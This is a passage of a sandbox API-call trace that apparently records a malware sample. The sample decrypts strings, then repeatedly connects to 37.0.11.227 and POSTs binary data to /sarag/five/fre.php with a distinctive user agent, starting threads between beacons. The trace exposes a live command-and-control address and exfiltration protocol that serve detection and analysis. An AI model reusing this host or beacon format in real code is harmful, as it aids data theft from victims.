out: phKey=0x19fcac*=0x69cfe8) returned 1 [0333.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.559] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.562] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.562] GetProcessHeap () returned 0x690000 [0333.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0333.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.564] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0333.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.565] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0333.566] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.567] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0333.567] GetProcessHeap () returned 0x690000 [0333.567] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.568] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0333.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.569] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0333.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.570] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0333.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.572] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0333.572] GetProcessHeap () returned 0x690000 [0333.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0333.572] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0333.572] GetProcessHeap () returned 0x690000 [0333.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0333.572] socket (af=2, type=1, protocol=6) returned 0xbc4 [0333.572] connect (s=0xbc4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0333.646] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0333.646] GetProcessHeap () returned 0x690000 [0333.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0333.646] GetProcessHeap () returned 0x690000 [0333.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0333.647] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.648] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0333.648] GetProcessHeap () returned 0x690000 [0333.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0333.648] GetProcessHeap () returned 0x690000 [0333.648] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.648] GetProcessHeap () returned 0x690000 [0333.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0333.649] GetProcessHeap () returned 0x690000 [0333.649] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0333.649] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.650] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0333.650] GetProcessHeap () returned 0x690000 [0333.650] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0333.651] GetProcessHeap () returned 0x690000 [0333.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.651] send (s=0xbc4, buf=0x6ad508*, len=242, flags=0) returned 242 [0333.652] send (s=0xbc4, buf=0x6aba40*, len=159, flags=0) returned 159 [0333.652] GetProcessHeap () returned 0x690000 [0333.652] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0333.652] recv (in: s=0xbc4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0333.734] GetProcessHeap () returned 0x690000 [0333.734] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0333.734] GetProcessHeap () returned 0x690000 [0333.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0333.735] GetProcessHeap () returned 0x690000 [0333.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0333.736] GetProcessHeap () returned 0x690000 [0333.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0333.736] closesocket (s=0xbc4) returned 0 [0333.737] GetProcessHeap () returned 0x690000 [0333.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0333.737] GetProcessHeap () returned 0x690000 [0333.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.737] GetProcessHeap () returned 0x690000 [0333.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0333.738] GetProcessHeap () returned 0x690000 [0333.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0333.739] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1910) returned 0xbc4 [0333.743] Sleep (dwMilliseconds=0xea60) [0333.746] GetProcessHeap () returned 0x690000 [0333.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0333.747] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.747] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0333.767] GetProcessHeap () returned 0x690000 [0333.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0333.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.769] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0333.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.770] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.771] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.771] GetProcessHeap () returned 0x690000 [0333.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0333.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.788] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0333.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.790] CryptDestroyKey (hKey=0x69d628) returned 1 [0333.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.791] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0333.791] GetProcessHeap () returned 0x690000 [0333.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.792] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0333.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.794] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0333.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.795] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0333.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.796] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0333.796] GetProcessHeap () returned 0x690000 [0333.796] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0333.796] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0333.797] GetProcessHeap () returned 0x690000 [0333.797] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0333.797] GetProcessHeap () returned 0x690000 [0333.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.798] GetProcessHeap () returned 0x690000 [0333.798] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0333.798] GetProcessHeap () returned 0x690000 [0333.798] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0333.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.799] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0333.815] GetProcessHeap () returned 0x690000 [0333.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0333.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.819] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0333.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.820] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.821] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.822] GetProcessHeap () returned 0x690000 [0333.822] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0333.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.824] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0333.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.825] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0333.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.826] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0333.826] GetProcessHeap () returned 0x690000 [0333.826] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.828] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0333.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.831] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0333.832] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.832] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0333.833] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.833] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0333.834] GetProcessHeap () returned 0x690000 [0333.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0333.834] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0333.834] GetProcessHeap () returned 0x690000 [0333.834] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0333.834] socket (af=2, type=1, protocol=6) returned 0xbc8 [0333.834] connect (s=0xbc8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0333.865] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0333.865] GetProcessHeap () returned 0x690000 [0333.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0333.865] GetProcessHeap () returned 0x690000 [0333.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0333.865] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.866] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0333.866] GetProcessHeap () returned 0x690000 [0333.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0333.866] GetProcessHeap () returned 0x690000 [0333.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.867] GetProcessHeap () returned 0x690000 [0333.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0333.867] GetProcessHeap () returned 0x690000 [0333.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0333.868] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0333.868] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0333.869] GetProcessHeap () returned 0x690000 [0333.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0333.869] GetProcessHeap () returned 0x690000 [0333.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0333.869] send (s=0xbc8, buf=0x6ad508*, len=242, flags=0) returned 242 [0333.869] send (s=0xbc8, buf=0x6aba40*, len=159, flags=0) returned 159 [0333.870] GetProcessHeap () returned 0x690000 [0333.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0333.870] recv (in: s=0xbc8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0333.942] GetProcessHeap () returned 0x690000 [0333.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0333.943] GetProcessHeap () returned 0x690000 [0333.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0333.944] GetProcessHeap () returned 0x690000 [0333.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0333.944] GetProcessHeap () returned 0x690000 [0333.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0333.944] closesocket (s=0xbc8) returned 0 [0333.945] GetProcessHeap () returned 0x690000 [0333.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0333.945] GetProcessHeap () returned 0x690000 [0333.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.947] GetProcessHeap () returned 0x690000 [0333.947] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0333.947] GetProcessHeap () returned 0x690000 [0333.947] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0333.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1914) returned 0xbc8 [0333.951] Sleep (dwMilliseconds=0xea60) [0333.952] GetProcessHeap () returned 0x690000 [0333.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0333.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0333.963] GetProcessHeap () returned 0x690000 [0333.963] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0333.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.964] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0333.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.965] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0333.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.966] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0333.966] GetProcessHeap () returned 0x690000 [0333.966] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0333.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.978] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0333.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.979] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0333.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.980] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0333.980] GetProcessHeap () returned 0x690000 [0333.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0333.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.981] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0333.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0333.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0333.985] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0333.985] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0333.985] GetProcessHeap () returned 0x690000 [0333.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0333.985] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0333.985] GetProcessHeap () returned 0x690000 [0333.985] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0333.986] GetProcessHeap () returned 0x690000 [0333.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0333.986] GetProcessHeap () returned 0x690000 [0333.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0333.987] GetProcessHeap () returned 0x690000 [0333.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0333.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0333.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.992] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0333.997] GetProcessHeap () returned 0x690000 [0333.997] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0333.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.998] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0333.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0333.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0334.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.021] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0334.021] GetProcessHeap () returned 0x690000 [0334.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0334.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.023] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0334.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.024] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0334.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0334.024] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0334.024] GetProcessHeap () returned 0x690000 [0334.025] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 